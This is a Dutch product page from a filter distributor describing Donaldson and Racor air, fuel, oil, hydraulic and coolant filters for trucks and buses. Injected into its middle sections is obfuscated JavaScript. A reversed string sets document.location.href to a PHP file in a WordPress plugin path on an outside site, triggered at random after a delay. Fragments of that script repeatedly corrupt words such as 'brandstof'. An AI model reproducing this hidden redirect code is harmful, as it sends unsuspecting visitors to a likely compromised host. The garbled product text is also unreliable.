Mobiele kranen, vrachtwagens of bussen.

Vrachtwagens

AIS biedt u een volledig filtergamma aan dat aan al uw behoeftes voldoet. Donaldson filters zijn duurzaam en robuust en met dezelfde onberispelijke kwaliteit vervaardigd als de originele filters. Donaldson rust de volgende merken origineel uit:

Bussen

Al meer dan 90 jaar is Donaldson wereldleider op het vlak van filtratie en wisselstukken. Donaldson filters zijn een eerste keus voor uw busvloot, ze verminderen aanzienlijk het aantal onderhoudsbeurten en het verbruik en bieden een maximale bescherming van uw motoren. Donaldson rust de volgende merken origineel uit:
 

PowerCore technologie

De nieuwe PoweCore technologie zorgt voor een betere filtratie met een compacter filterelement.

Donaldson vervangingselementen

De meeste vrachtwagens en bussen zijn reeds origineel uitgerust met Donaldson luchtfilters. Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze  link.

Cabinefilters

De Donaldson cabinefilters verbeteren de kwaliteit van de lucht vooraleer het in de cabine terechtkomt door de allergenen en de vervuilende moleculen tegen te houden.
) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters”]  

Spin-On en vervangingspatronen

Het gamma Donaldson brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstofilters werd de laatste jaren sterk uitgebreid. Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Zoek uw vervangingspatroon via deze  link.

Brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof-water afscheiders

De afvoerventielen “Twist&Drain” maken het vuile en complexe werk van het aftappen van het water in de brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilter een stuk gemakkelijker.

Racor brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters

Om ons gamma brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters te vervolledigen, bieden wij sinds enkele jaren ook Racor complete filters en vervangingselementen aan. Racor is door de jaren heen een specialist in brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstoffilters geworden en zodoende kunnen wij u, samen met Donaldson, een compleet gamma van eerste kwaliteit aanbieden!

Donaldson AdBlue filters

Teneinde tegemoet te komen aan de huidige en toekomstige emissienormen van uitlaatgassen zijn  vrachtwagens uitgerust met een AdBlue – tank. (SCR – technologie) Dit systeem vereist een ultra – performante filtratie, kwaliteit en betrouwbaarheid waaraan Donaldson meer dan voldoet.
 
 

Opdraaibare oliefilters

De “long life” oliefilters ontwikkeld door Donaldson, beschermen het prestatievermogen van uw machines zodat u zich kan focussen op wat echt belangrijk is: uw werk doen! . Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze link.
 

Filterpatronen

Donaldson omvat een volledig gamma oliefilterpatronen voor alle merken. .Deze filters dragen aanzienlijk bij tot de verlenging van de levensduur en de betrouwbaarheid van de motoren. Vind uw filter via deze link.
 

Vervangingselementen

Wij bieden u een ongeëvenaard gamma vervangingselementen en opdraaifilters voor hydraulische toepassingen. Donaldson heeft daarenboven een grote waaier aan filtermedia die u toelaten om de filter te kiezen die het best beantwoordt aan de zuiveringseisen van uw hydraulisch systeem. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren. Zoekt naar uw vervangingsfilter via de volgende link.

Ontluchters

Beschikbaar in een breed gamma modellen, materialen en afmetingen. De ontluchters zorgen voor een aanvoer van propere lucht in uw reservoirs en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere opslagapparatuur waar luchtcirculatie voorkomt naargelang het niveau van de vloeistoffen varieert.
Roest, kalkaanslag, vuil…zijn enkele van de vele onzuiverheden waar een motor mee wordt geconfronteerd. Onvoldoende bescherming kan leiden tot motorpech of erger. Het koelcircuit moet de temperatuur van de motor op het juiste niveau houden en zodoende een minimum aan brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andstof  verbruiken. Donaldson koelvloeistoffilters verwijderen de onzuiverheden, vermijden een filterverstopping en dragen bij tot de goede werking van de motor. Filtratie van koelvloeistof is een kwestie van evenwicht. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren.  

Koelvloeistoffilters en vervangingspatronen

Koelvloeistoffilters zijn ontworpen om het vereiste chemisch evenwicht in standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and te houden en de aanwezigheid van vervuilende deeltjes binnen het koelcircuit van de motor te verminderen. Deze filters verlengen aanzienlijk de levensduur en de betrouwbaarheid van uw motoren. Zoek uw vervangingspatroon via deze link.

Testset voor koelvloeistof (chemisch evenwicht)

Wij bieden u een snelwerkende testset aan om het chemisch evenwicht van de vloeistof binnen uw koelcircuit te behouden. Deze kits zijn zeer practisch om het vereiste evenwicht te controleren.

Donaldson & Wabco luchtdrogers